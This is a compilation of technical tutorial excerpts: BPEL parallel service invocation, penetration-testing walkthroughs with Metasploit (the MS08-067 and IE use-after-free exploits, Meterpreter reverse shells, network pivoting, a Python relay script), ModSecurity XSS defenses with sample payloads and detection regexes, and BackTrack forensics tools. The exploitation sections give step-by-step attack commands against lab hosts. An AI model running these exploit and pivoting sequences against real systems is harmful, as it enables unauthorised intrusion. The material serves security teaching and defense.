We will deploy the project to the SOA Suite process server the same way we did in the previous sample. Then, we will log in to the Enterprise Manager console, select the project Bookstore, and click on the Test Web Service button. To observe that the services have been invoked in parallel, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, click on the book warehousing BPEL process, and activate the flow view, which shows that both bookstore services have been invoked in parallel.

Understanding parallel flow

To invoke services concurrently, we can use the <flow> construct. In the following example, the three <invoke> operations will perform concurrently:

<process ...>
   ...
   <sequence>
      <!-- Wait for the incoming request to start the process -->
      <receive ... />
      <!-- Invoke a set of related services, concurrently -->
      <flow>
         <invoke ... />
         <invoke ... />
         <invoke ... />
      </flow>
      ...
      <!-- Return the response -->
      <reply ... />
   </sequence>
</process>

We can also combine and nest the <sequence> and <flow> constructs, which allows us to define several sequences that execute concurrently. In the following example, we have defined two sequences, one that consists of three invocations, and one with two invocations. Both sequences will execute concurrently:

<process ...>
   ...
   <sequence>
      <!-- Wait for the incoming request to start the process -->
      <receive ... />
      <!-- Invoke two sequences concurrently -->
      <flow>
         <!-- The three invokes below execute sequentially -->
         <sequence>
            <invoke ... />
            <invoke ... />
            <invoke ... />
         </sequence>
         <!-- The two invokes below execute sequentially -->
         <sequence>
            <invoke ... />
            <invoke ... />
         </sequence>
      </flow>
      ...
      <!-- Return the response -->
      <reply ... />
   </sequence>
</process>

We can use other activities as well within the <flow> activity to achieve parallel execution.
With this, we have concluded our discussion on the parallel invocation.

Pop quiz – service invocation

Q1. Which activity is used to invoke services from BPEL processes?

- <receive>
- <invoke>
- <sequence>
- <flow>
- <process>
- <reply>

Q2. Which parameters do we need to specify for the <invoke> activity?

- endpointURL
- partnerLink
- operationName
- operation
- portType
- portTypeLink

Q3. In which file do we declare partner link types?

Q4. Which activity is used to execute service invocation and other BPEL activities in parallel?

- <receive>
- <invoke>
- <sequence>
- <flow>
- <process>
- <reply>

Summary

In this chapter, we learned how to invoke and orchestrate services. We explained the primary mission of BPEL: service orchestration. It follows the concept of programming-in-the-large. We have developed a BPEL process that invoked two services and orchestrated them. We have become familiar with the <invoke> activity and understood the service invocation's background, particularly partner links and partner link types. We also learned that from BPEL it is very easy to invoke services in parallel. To achieve this, we use the <flow> activity. Within <flow>, we can not only nest several <invoke> activities but also other BPEL activities. Now, we are ready to learn about variables and data manipulation, which we will do in the next chapter.

Exploitation Basics

Packt
27 Aug 2013
7 min read
(For more resources related to this topic, see here.)

Basic terms of exploitation

The basic terms of exploitation are explained as follows:

- Vulnerability: A vulnerability is a security hole in software or hardware that allows an attacker to compromise a system. A vulnerability can be as simple as a weak password or as complex as a Denial of Service attack.
- Exploit: An exploit refers to a well-known security flaw or bug through which a hacker gains entry into a system. An exploit is the actual code with which an attacker takes advantage of a particular vulnerability.
- Payload: Once an exploit executes on the vulnerable system and the system has been compromised, the payload enables us to control the system. The payload is typically attached to the exploit and delivered with it.
- Shellcode: This is a set of instructions usually used as a payload when the exploitation occurs.
- Listener: A listener works as a component waiting for an incoming connection.

How does exploitation work?

Consider the scenario of a computer lab in which two students are working on their computers. After some time, one of the students goes out for a coffee break and responsibly locks down his computer. The password for that particular locked computer is Apple, which is a very simple dictionary word and is a system vulnerability. The other student starts a password-guessing attack against the system of the student who left the lab. This is a classic example of an exploit. The controls that help the malicious user control the system after successfully logging in to the computer are called the payload.

We now come to the bigger question of how exploitation actually works. An attacker basically sends an exploit with an attached payload to the vulnerable system. The exploit runs first, and if it succeeds, the actual code of the payload runs. After the payload runs, the attacker gets fully privileged access to the vulnerable system, and then he may download data; upload malware, viruses, or backdoors; or do whatever he wants.

A typical process for compromising a system

For compromising any system, the first step is to scan the IP address to find open ports and identify its operating system and services. Then we move on to identifying a vulnerable service and finding an exploit in Metasploit for that particular service. If the exploit is not available in Metasploit, we will go through Internet databases such as www.securityfocus.com, www.exploitdb.com, www.1337day.com, and so on. After successfully finding an exploit, we launch it and compromise the system.

The tools commonly used for port scanning are Nmap (Network Mapper), Autoscan, Unicorn Scan, and so on. For example, here we are using Nmap to scan for open ports and their services.

First, open the terminal in your BackTrack virtual machine. Type in nmap -v -n 192.168.0.103 and press Enter to scan. We use the -v parameter to get verbose output and the -n parameter to disable reverse DNS resolutions.

Here we can see the results of Nmap, showing three open ports with their services running on them. If we need more detailed information, such as the service version or operating system type, we have to perform an intense scan using Nmap. For an intense scan, we use the command nmap -T4 -A -v 192.168.0.103. This shows us the complete results of the service version and the operating system type.

The next step is to find an exploit according to the service or its version.
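Before moving on, it is worth seeing what service-version detection boils down to: many services announce themselves with a banner as soon as you connect. The following Python sketch illustrates the idea (the address and port are the ones from our scan; Nmap's -sV probes are far more thorough than this):

    import socket

    # Grab whatever banner the service volunteers on connect.
    # HOST and PORT are taken from the example scan above.
    HOST, PORT = "192.168.0.103", 21

    with socket.create_connection((HOST, PORT), timeout=5) as sock:
        sock.settimeout(5)
        try:
            banner = sock.recv(1024)
            print(banner.decode(errors="replace").strip())
        except socket.timeout:
            print("Service did not volunteer a banner")

Matching a banner against a known vulnerable version is exactly what guides the choice of exploit in the steps that follow.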
Here, we can see that the first service running on port number 135 is msrpc, which is known as Microsoft Windows RPC. Now we will learn how to find an exploit for this particular service in Metasploit. Let's open our terminal and type in msfconsole to start Metasploit. Typing in search dcom searches all of the Windows RPC-related exploits in its database. In the following screenshot, we can see the exploit with its description and also the release date of this vulnerability.

We are presented with a list of exploits according to their rank. From the three exploits related to this vulnerability, we select the first one, since it is the most effective exploit with the highest rank. Now we have learned the technique of searching for an exploit in Metasploit through the search <service name> command.

Finding exploits from online databases

If the exploit is not available in Metasploit, then we have to search the Internet exploit databases for that particular exploit. Now we will learn how to search for an exploit on online services such as www.1337day.com. We open the website and click on the Search tab. As an example, we will search for exploits on the Windows RPC service.

Now we have to download and save a particular exploit. For this, just click on the exploit you need. After clicking on the exploit, it shows the description of that exploit. Click on Open material to view or save the exploit. The usage of this exploit is provided as a part of the documentation in the exploit code, as marked in the following screenshot.

Now we will exploit our target machine with the particular exploit that we have downloaded. We have already scanned the IP address and found three open ports. The next step would be to exploit one of those ports. As an example, we will target the port number 135 service running on this target machine, which is msrpc.

Let us start by compiling the downloaded exploit code. To compile the code, launch the terminal and type in gcc <exploit name with path> -o <exploit name>. For example, here we are typing gcc dcom.c -o dcom.

After compiling the exploit, we have a binary file of that exploit, which we use to exploit the target by running the file in the terminal, typing in ./<filename>. From the preceding screenshot, we can see the requirements for exploiting the target. It requires the target IP address and the ID (Windows version). Let's have a look at our target IP address. We have the target IP address, so let's start the attack. Type in ./dcom 6 192.168.174.129.

The target has been exploited, and we already have the command shell. Now we check the IP address of the victim machine. Type in ipconfig. The target has been compromised, and we have actually gained access to it.

Now we will see how to use the internal exploits of Metasploit. We have already scanned an IP address and found three open ports. This time we target port number 445, which runs the Microsoft-ds service. Let us start by selecting an exploit. Launch msfconsole, type in use exploit/windows/smb/ms08_067_netapi, and press Enter.

The next step will be to check the options for the exploit and what it requires in order to perform a successful exploitation. We type in show options and it will show us the requirements. We need to set RHOST (the remote host), which is the target IP address, and let the other options keep their default values. We set the RHOST, or the target address, by typing in set RHOST 192.168.0.103. After setting up the options, we are all set to exploit our target.
Typing in exploit will give us the Meterpreter shell.

References

The following are some helpful references that shed further light on some of the topics covered in this article:

- http://www.securitytube.net/video/1175
- http://resources.infosecinstitute.com/system-exploitation-metasploit/

Summary

In this article, we covered the basics of vulnerabilities, payloads, and some tips on the art of exploitation. We also covered the techniques used to search for vulnerable services and to query the Metasploit database for an exploit. These exploits were then used to compromise the vulnerable system. We also demonstrated the art of searching for exploits in Internet databases, which contain zero-day exploits for software and services.

Resources for Article:

Further resources on this subject:

- Understanding the True Security Posture of the Network Environment being Tested [Article]
- So, what is Metasploit? [Article]
- Tips and Tricks on BackTrack 4 [Article]

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting

To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines, with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine as the second victim.

The scenario is that we get a client to go to our malicious site, and we use an exploit called Use After Free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website.

The exploit listed at the top of the list is one that works against Internet Explorer 9. As an example, we will target the exploit that works against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated.

Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot.

One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing.

For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window:

use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.177.170
set LHOST 192.168.177.170
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

An example of the results of the preceding commands is shown in the following screenshot.

As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot (the cropped text is not important).

We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot.

As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now.
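Conceptually, the pivot we are about to configure is just a relay: traffic from the attacker is forwarded through the compromised dual-homed host into the hidden network. The following Python sketch shows the bare idea (the listening port is arbitrary, and the target address is the host we discover later in this example; Meterpreter's autoroute does all of this for us at the session level):

    import socket
    import threading

    LISTEN = ("0.0.0.0", 4445)        # where the attacker connects
    TARGET = ("10.2.0.149", 445)      # host on the hidden 10.x network

    def pump(src, dst):
        # Copy bytes one way until either side closes the connection.
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)

    server = socket.socket()
    server.bind(LISTEN)
    server.listen(1)
    client, _ = server.accept()
    remote = socket.create_connection(TARGET)
    threading.Thread(target=pump, args=(client, remote), daemon=True).start()
    pump(remote, client)

With that mental model in place, let's set up the real thing.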
The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell: it provides us with the capability to set the route up. In the shell, enter run autoroute -s 10.2.0.0/24 to set up a route to our 10 network. Once the command is complete, we will view our routing table; enter run autoroute -p to display the routing table. An example of this is shown in the following screenshot.

As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will background session 1; press Ctrl + Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands:

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.0.0/24
set PORTS 139,445
set THREADS 50
run

The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit. Enter nmap -sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results of this scan is shown in the following screenshot.

We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Server Service buffer overflow. In the metasploit window, send the session to the background and enter the following commands:

use exploit/windows/smb/ms08_067_netapi
set RHOST 10.2.0.149
set PAYLOAD windows/meterpreter/bind_tcp
exploit

If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration of the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot.

As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected by the Local Pipe | Remote Pipe reference. Once you have finished reviewing the information, enter sessions to display the information for the sessions. An example of the result is shown in the following screenshot.

Summary

In this article, we looked at the powerful technique of establishing a pivot point from a client.

Resources for Article:

Further resources on this subject:

- Installation of Oracle VM VirtualBox on Linux [article]
- Using Virtual Destinations (Advanced) [article]
- Quick Start into Selenium Tests [article]

Blocking Common Attacks using ModSecurity 2.5: Part 2

Packt
01 Dec 2009
11 min read
Cross-site scripting

Cross-site scripting attacks occur when user input is not properly sanitized and ends up in pages sent back to users. This makes it possible for an attacker to include malicious scripts in a page by providing them as input to the page. The scripts will be no different from scripts included in pages by the website creators, and will thus have all the privileges of an ordinary script within the page, such as the ability to read cookie data and session IDs. In this article, we will look in more detail at how to prevent these attacks.

The name "cross-site scripting" is actually rather poorly chosen; it stems from the first such vulnerability that was discovered, which involved a malicious website using HTML framesets to load an external site inside a frame. The malicious site could then manipulate the loaded external site in various ways, for example, read form data, modify the site, and basically perform any scripting action that a script within the site itself could perform. Thus cross-site scripting, or XSS, was the name given to this kind of attack.

The attacks described as XSS attacks have since shifted from malicious frame injection (a problem that was quickly patched by web browser developers) to the class of attacks that we see today involving unsanitized user input. The actual vulnerability referred to today might be better described as a "malicious script injection attack", though that doesn't give it quite as flashy an acronym as XSS. (And in case you're curious why the acronym is XSS and not CSS, the simple explanation is that although CSS was used as short for cross-site scripting in the beginning, it was changed to XSS because so many people were confusing it with the acronym used for Cascading Style Sheets, which is also CSS.)

Cross-site scripting attacks can lead not only to cookie and session data being stolen, but also to malware being downloaded and executed and to arbitrary content being injected into web pages. Cross-site scripting attacks can generally be divided into two categories:

- Reflected attacks: This kind of attack exploits cases where the web application takes data provided by the user and includes it without sanitization in output pages. The attack is called "reflected" because an attacker causes a user to provide a malicious script to a server in a request that is then reflected back to the user in returned pages, causing the script to execute.
- Stored attacks: In this type of XSS attack, the attacker is able to include his malicious payload in data that is permanently stored on the server and will be included, without any HTML entity encoding, in pages served to subsequent visitors. Examples include storing malicious scripts in forum posts or user presentation pages. This type of XSS attack has the potential to be more damaging, since it can affect every user who views a certain page.

Preventing XSS attacks

The most important measure you can take to prevent XSS attacks is to make sure that all user-supplied data that is output in your web pages is properly sanitized. This means replacing potentially unsafe characters, such as angled brackets (< and >), with their corresponding HTML-entity encoded versions, in this case &lt; and &gt;.

Here is a list of characters that you should encode when present in user-supplied data that will later be included in web pages:

Character    HTML-encoded version
<            &lt;
>            &gt;
(            &#40;
)            &#41;
#            &#35;
&            &amp;
"            &quot;
'            &#39;

In PHP, you can use the htmlentities() function to achieve this.
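If you are working in a language other than PHP, the standard libraries offer equivalents. Here is a minimal sketch in Python; note that html.escape() covers the angled brackets, quotes, and ampersand from the table above, while characters such as the parentheses and # would need an extra replacement step of your own:

    import html

    user_input = "<script>alert('XSS')</script>"
    safe = html.escape(user_input, quote=True)

    # Prints: &lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;
    print(safe)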
When encoded, the string <script> will be converted into &lt;script&gt;. This latter version will be displayed as <script> in the web browser, without being interpreted as the start of a script by the browser.

In general, users should not be allowed to input any HTML markup tags if it can be avoided. If you do allow markup such as <a href="..."> to be input by users in blog comments, forum posts, and similar places, then you should be aware that simply filtering out the <script> tag is not enough, as this simple example shows:

<a href="http://www.google.com" onMouseOver="javascript:alert('XSS Exploit!')">Innocent link</a>

This link will execute the JavaScript code contained within the onMouseOver attribute whenever the user hovers his mouse pointer over the link. You can see why, even if the web application replaced <script> tags with their HTML-encoded version, an XSS exploit would still be possible by simply using onMouseOver or any of the other related events available, such as onClick or onMouseDown.

I want to stress that properly sanitizing user input as just described is the most important step you can take to prevent XSS exploits from occurring. That said, if you want to add an additional line of defense by creating ModSecurity rules, here are some common XSS script fragments and regular expressions for blocking them:

Script fragment    Regular expression
<script            <script
eval(              eval\s*\(
onMouseOver        onmouseover
onMouseOut         onmouseout
onMouseDown        onmousedown
onMouseMove        onmousemove
onClick            onclick
onDblClick         ondblclick
onFocus            onfocus

PDF XSS protection

You may have seen the ModSecurity directive SecPdfProtect mentioned, and wondered what it does. This directive exists to protect users from a particular class of cross-site scripting attack that affects users running a vulnerable version of the Adobe Acrobat PDF reader. A little background is required in order to understand what SecPdfProtect does and why it is necessary.

In 2007, Stefano Di Paola and Giorgio Fedon discovered a vulnerability in Adobe Acrobat that allows attackers to insert JavaScript into requests, which is then executed by Acrobat in the context of the site hosting the PDF file. Sound confusing? Hang on, it will become clearer in a moment.

The vulnerability was quickly fixed by Adobe in version 7.0.9 of Acrobat. However, there are still many users out there running old versions of the reader, which is why preventing this sort of attack is still an ongoing concern.

The basic attack works like this: an attacker entices the victim to click a link to a PDF file hosted on www.example.com. Nothing unusual so far, except for the fact that the link looks like this:

http://www.example.com/document.pdf#x=javascript:alert('XSS');

Surprisingly, vulnerable versions of Adobe Acrobat will execute the JavaScript in the above link. It doesn't even matter what you place before the equal sign; gibberish= will work just as well as x= in triggering the exploit. Since the PDF file is hosted on the domain www.example.com, the JavaScript will run as if it were a legitimate piece of script within a page on that domain. This can lead to all of the standard cross-site scripting attacks that we have seen examples of before.

The vulnerability does not exist if a user downloads the PDF file and then opens it from his local hard drive. ModSecurity solves the problem of this vulnerability by issuing a redirect for all PDF files.
The aim is to convert any URLs like the following:

http://www.example.com/document.pdf#x=javascript:alert('XSS');

into a redirected URL that has its own hash character:

http://www.example.com/document.pdf#protection

This will block any attacks attempting to exploit this vulnerability. The only problem with this approach is that it will generate an endless loop of redirects, as ModSecurity has no way of knowing which is the first request for the PDF file and which is a request that has already been redirected. ModSecurity therefore uses a one-time token to keep track of redirect requests. All redirected requests get a token included in the new request string. The redirect link now looks like this:

http://www.example.com/document.pdf?PDFTOKEN=XXXXX#protection

ModSecurity keeps track of these tokens so that it knows which links are valid and should lead to the PDF file being served. Even if a token is not valid, the PDF file will still be available to the user; he will just have to download it to the hard drive.

These are the directives used to configure PDF XSS protection in ModSecurity:

SecPdfProtect On
SecPdfProtectMethod TokenRedirection
SecPdfProtectSecret "SecretString"
SecPdfProtectTimeout 10
SecPdfProtectTokenName "token"

The above configures PDF XSS protection, and uses the secret string SecretString to generate the one-time tokens. The last directive, SecPdfProtectTokenName, can be used to change the name of the token argument (the default is PDFTOKEN). This can be useful if you want to hide the fact that you are running ModSecurity, but unless you are really paranoid, it won't be necessary to change this.

The SecPdfProtectMethod can also be set to ForcedDownload, which will force users to download the PDF files instead of viewing them in the browser. This can be an inconvenience to users, so you would probably not want to enable it unless circumstances warrant (for example, if a new PDF vulnerability of the same class is discovered in the future).

HttpOnly cookies to prevent XSS attacks

One mechanism to mitigate the impact of XSS vulnerabilities is the HttpOnly flag for cookies. This extension to the cookie protocol was proposed by Microsoft (see http://msdn.microsoft.com/en-us/library/ms533046.aspx for a description), and is currently supported by the following browsers:

- Internet Explorer (IE6 SP1 and later)
- Firefox (2.0.0.5 and later)
- Google Chrome (all versions)
- Safari (3.0 and later)
- Opera (version 9.50 and later)

HttpOnly cookies work by adding the HttpOnly flag to cookies that are returned by the server, which instructs the web browser that the cookie should only be used when sending HTTP requests to the server and should not be made available to client-side scripts via, for example, the document.cookie property. While this doesn't completely solve the problem of XSS attacks, it does mitigate those attacks where the aim is to steal valuable information from the user's cookies, such as session IDs.

A cookie header with the HttpOnly flag set looks like this:

Set-Cookie: SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly

HttpOnly cookies need to be supported on the server side for clients to be able to take advantage of the extra protection afforded by them.
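Before looking at platform-specific switches, it helps to see that the flag is nothing more than text appended to the Set-Cookie header. The following Python sketch serves a page that sets an HttpOnly session cookie (the session value is a hard-coded placeholder; a real application must generate random session IDs):

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            # The HttpOnly attribute keeps document.cookie from seeing this value.
            self.send_header("Set-Cookie",
                             "SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly")
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><body>Hello</body></html>")

    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()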
Some web development platforms support HttpOnly cookies through the appropriate configuration option. For example, PHP 5.2.0 and later allow HttpOnly cookies to be enabled for a page by using the following ini_set() call:

<?php
ini_set("session.cookie_httponly", 1);
?>

Tomcat (a Java Servlet and JSP server) version 6.0.19 and later supports HttpOnly cookies, and they can be enabled by modifying a context's configuration so that it includes the useHttpOnly option, like so:

<Context>
<Manager useHttpOnly="true" />
</Context>

In case you are using a web platform that doesn't support HttpOnly cookies, it is actually possible to use ModSecurity to add the flag to outgoing cookies. We will see how to do this now.

Session identifiers

Assuming we want to add the HttpOnly flag to session identifier cookies, we need to know which cookies are associated with session identifiers. The following table lists the name of the session identifier cookie for some of the most common languages:

Language    Session identifier cookie name
PHP         PHPSESSID
JSP         JSESSIONID
ASP         ASPSESSIONID
ASP.NET     ASP.NET_SessionId

The table shows us that a good regular expression to identify session IDs would be (sessionid|sessid), which can be shortened to sess(ion)?id. The web programming language you are using might use another name for the session cookie. In that case, you can always find out what it is by looking at the headers returned by the server:

echo -e "GET / HTTP/1.1\nHost: yourserver.com\n\n" | nc yourserver.com 80 | head

Look for a line similar to:

Set-Cookie: JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/

This is the session cookie. In this case its name is JSESSIONID, since the server is running Tomcat and the JSP web application language. The following rules are used to add the HttpOnly flag to session cookies:

# Add HttpOnly flag to session cookies
SecRule RESPONSE_HEADERS:Set-Cookie "!(?i:HttpOnly)" "phase:3,chain,pass"
SecRule MATCHED_VAR "(?i:sess(ion)?id)" "setenv:session_cookie=%{MATCHED_VAR}"
Header set Set-Cookie "%{SESSION_COOKIE}e; HttpOnly" env=session_cookie

We are putting the rule chain in phase 3 (RESPONSE_HEADERS), since we want to inspect the response headers for the presence of a Set-Cookie header. We are looking for those Set-Cookie headers that do not contain an HttpOnly flag. The (?i: ) parentheses are a regular expression construct known as a mode-modified span. This tells the regular expression engine to ignore the case of the HttpOnly string when attempting to match. Using the t:lowercase transform would have been more complicated, as we will be using the matched variable in the next rule, and we don't want the case of the variable modified when we set the environment variable.
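Once rules like these are in place, it is easy to confirm that every session cookie leaves the server with the flag set. Here is a small checker sketch in Python, using only the standard library (substitute your own host name for yourserver.com):

    import http.client

    conn = http.client.HTTPConnection("yourserver.com", 80, timeout=10)
    conn.request("GET", "/")
    response = conn.getresponse()

    # getheaders() preserves repeated Set-Cookie headers as separate entries.
    for name, value in response.getheaders():
        if name.lower() == "set-cookie":
            status = "OK" if "httponly" in value.lower() else "MISSING HttpOnly"
            print(f"{value}  ->  {status}")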

BackTrack Forensics

Packt
28 Feb 2013
8 min read
(For more resources related to this topic, see here.)

Intrusion detection and log analysis

Intrusion detection is a method used to monitor malicious activity on a computer network or system. It's generally referred to as an intrusion detection system (IDS), because it's the system that actually performs the task of monitoring activity based upon a set of predefined rules. An IDS adds an additional layer of security to a network by analyzing information from various points and determining whether an actual or possible security breach has occurred, or whether a vulnerability is present that would allow for a possible breach.

In this recipe, we will examine the Snort tool for the purposes of intrusion detection and log analysis. Snort was developed by Sourcefire, and is an open source tool that has the capability of acting as both an intrusion detection system and an intrusion prevention system. One of the advantages of Snort is that it allows you to analyze network traffic in real time and respond faster should security breaches occur. Remember, running Snort on our network and utilizing it for intrusion detection does not stop exploits from occurring. It just gives us the ability to see what is going on in our network.

Getting ready

A connection to the Internet or intranet is required to complete this task. It is assumed that you have visited http://snort.org/start/rules and downloaded the Sourcefire Vulnerability Research Team (VRT) Certified Rules. A valid ruleset must be maintained in order to use Snort for detection. If you do not have an account already, you may sign up at https://www.snort.org/signup.

How to do it...

Let's begin by starting Snort:

1. Start the Snort service.
2. Now that the Snort service has been initiated, we will start the application from a terminal window. We are going to pass a few options, described as follows:
   - -q: This option tells Snort to run quietly, suppressing the startup banner and status output.
   - -v: This option allows us to view a printout of TCP/IP headers on the screen. This is also called the "sniffer mode" setting.
   - -c: This option allows us to select our configuration file. In this case, its location is /etc/snort/snort.conf.
   - -i: This option allows you to specify your interface.
3. Using these options, let's execute the following command:
   snort -q -v -i eth1 -c /etc/snort/snort.conf
4. To stop Snort from monitoring, press Ctrl + C.

How it works...

In this recipe, we started the Snort service and launched Snort in order to view the log data.

There's more...

Before we can adequately use Snort for our purposes, we need to make alterations to its configuration file. Open a terminal window and locate the Snort configuration file:

locate snort.conf

Now we will edit the configuration file using nano:

nano /etc/snort/snort.conf

Look for the line that reads var HOME_NET any. We would like to change this to our internal network (the devices we would like to have monitored). Each situation is going to be unique. You may want to monitor only one device, which you can do simply by entering its IP address (var HOME_NET 192.168.10.10). You may also want to monitor an IP range (var HOME_NET 192.168.10.0/24), or you may want to specify multiple ranges (var HOME_NET 192.168.10.0/24,10.0.2.0/24). In our case, we will look at just our local network:

var HOME_NET 192.168.10.0/24
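The HOME_NET value is an ordinary CIDR range. If you are ever unsure whether a given address falls inside the range you have configured, Python's standard ipaddress module gives a quick sanity check (the addresses below are the ones used in this recipe):

    import ipaddress

    home_net = ipaddress.ip_network("192.168.10.0/24")

    for addr in ("192.168.10.10", "10.0.2.15"):
        inside = ipaddress.ip_address(addr) in home_net
        print(f"{addr} in HOME_NET: {inside}")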
Likewise, we need to specify what is considered the external network. For most purposes, we want any IP address that is not part of our specified home network to be considered external. So we will comment out the line that reads var EXTERNAL_NET any and uncomment the line that says var EXTERNAL_NET !$HOME_NET:

#var EXTERNAL_NET any
var EXTERNAL_NET !$HOME_NET

These are the two lines that you need to alter to match the changes mentioned in this step. To view an extended list of Snort commands, please visit the Snort Users Manual at http://www.snort.org/assets/166/snort_manual.pdf.

Recursive directory encryption/decryption

Encryption is a method of transforming data into a format that cannot be read by other users. Decryption is the method of transforming data back into a readable format. The benefit of encrypting your data is that even if it is stolen, without the correct decryption key it is unusable by the stealing party. Depending on the program you use, you have the ability to encrypt individual files, folders, or entire hard drives.

In this recipe, we will use gpgdir to perform recursive directory encryption and decryption. An advantage of using gpgdir is that it has the ability to encrypt not only a folder, but also all subfolders and files contained within the main folder. This will save you a lot of time and effort!

Getting ready

To complete this recipe, you must have gpgdir installed on your BackTrack version.

How to do it...

In order to use gpgdir, you must have it installed. If you have not installed it before, use the following instructions:

1. Open a terminal window and make a new directory under the root filesystem:
   mkdir /sourcecode
2. Change to the sourcecode directory:
   cd /sourcecode
3. Next, we will use Wget to download the gpgdir application:
   wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2
4. Next, we download the signature file:
   wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc
5. Next, we import the author's public key and verify the package:
   gpg --import public_key
   gpg --verify gpgdir-1.9.5.tar.bz2.asc
6. Next, we untar gpgdir, switch to its directory, and complete the installation:
   tar xfj gpgdir-1.9.5.tar.bz2
   cd gpgdir-1.9.5
   ./install.pl
7. The first time you run gpgdir, a new file will be created in your root directory (assuming root is the user you are using under BackTrack). The file is called ./gpgdirrc. To start the creation of the file, type the following command:
   gpgdir
8. Finally, we need to edit the gpgdirrc file and remove the comment from the default_key variable:
   vi /root/.gpgdirrc

Now that you have gpgdir installed, let's use it to perform recursive directory encryption and decryption:

1. Open a terminal window and create a directory for us to encrypt:
   mkdir /encrypted_directory
2. Add files to the directory. You can add as many files as you would like, using the Linux copy command cp.
3. Now, we will use gpgdir to encrypt the directory:
   gpgdir -e /encrypted_directory
4. At the prompt, enter your password. This is the password associated with your key file.
5. To decrypt the directory with gpgdir, type the following command:
   gpgdir -d /encrypted_directory

How it works...

In this recipe, we used gpgdir to recursively encrypt a directory and to subsequently decrypt it. We began the recipe by installing gpgdir and editing its configuration file. Once gpgdir has been installed, we have the ability to encrypt and decrypt directories. For more information on gpgdir, please visit its documentation website at http://cipherdyne.org/gpgdir/docs/.
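Under the hood, gpgdir essentially walks the directory tree and runs GnuPG on each file. The following Python sketch captures that idea (it assumes the gpg binary is on your path, and YOUR_KEY_ID is a placeholder for the key named in your ~/.gpgdirrc; gpgdir itself adds exclusion lists, password handling, and safety checks that this toy version omits):

    import os
    import subprocess

    KEY_ID = "YOUR_KEY_ID"            # placeholder; use your own key ID
    TARGET = "/encrypted_directory"   # the directory created in this recipe

    for dirpath, _dirnames, filenames in os.walk(TARGET):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if path.endswith(".gpg"):
                continue  # skip files that are already encrypted
            # gpg writes the encrypted copy next to the original as path + ".gpg"
            subprocess.run(["gpg", "--encrypt", "--recipient", KEY_ID, path],
                           check=True)
            os.remove(path)  # remove the plaintext original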
Scanning for signs of rootkits

A rootkit is a malicious program designed to hide suspicious processes from detection and allow continued, often remote, access to a computer system. Rootkits can be installed using various methods, including hiding executable code within web page links, downloaded software programs, or media files and documents. In this recipe, we will utilize chkrootkit to search for rootkits on our Windows or Linux system.

Getting ready

In order to scan for a rootkit, you can either use your BackTrack installation, log in to a compromised virtual machine remotely, or mount the BackTrack 5 R3 DVD on a computer system to which you have physical access.

How to do it...

Let's begin exploring chkrootkit by navigating to it from the BackTrack menu:

1. Navigate to Applications | BackTrack | Forensics | Anti-Virus Forensics Tools | chkrootkit.
2. Alternatively, you can enter the following commands to run chkrootkit:
   cd /pentest/forensics/chkrootkit
   ./chkrootkit
3. chkrootkit will begin execution immediately, and you will be provided with output on your screen as the checks are processed.

How it works...

In this recipe, we used chkrootkit to check for malware, Trojans, and rootkits on our localhost. chkrootkit is a very effective scanner that can be used to determine if our system has been attacked. It's also useful when BackTrack is loaded as a live DVD and used to scan a computer you think is infected by rootkits.

There's more...

Alternatively, you can run Rootkit Hunter (rkhunter) to find rootkits on your system:

1. Open a terminal window and run the following command to launch rkhunter:
   rkhunter --check
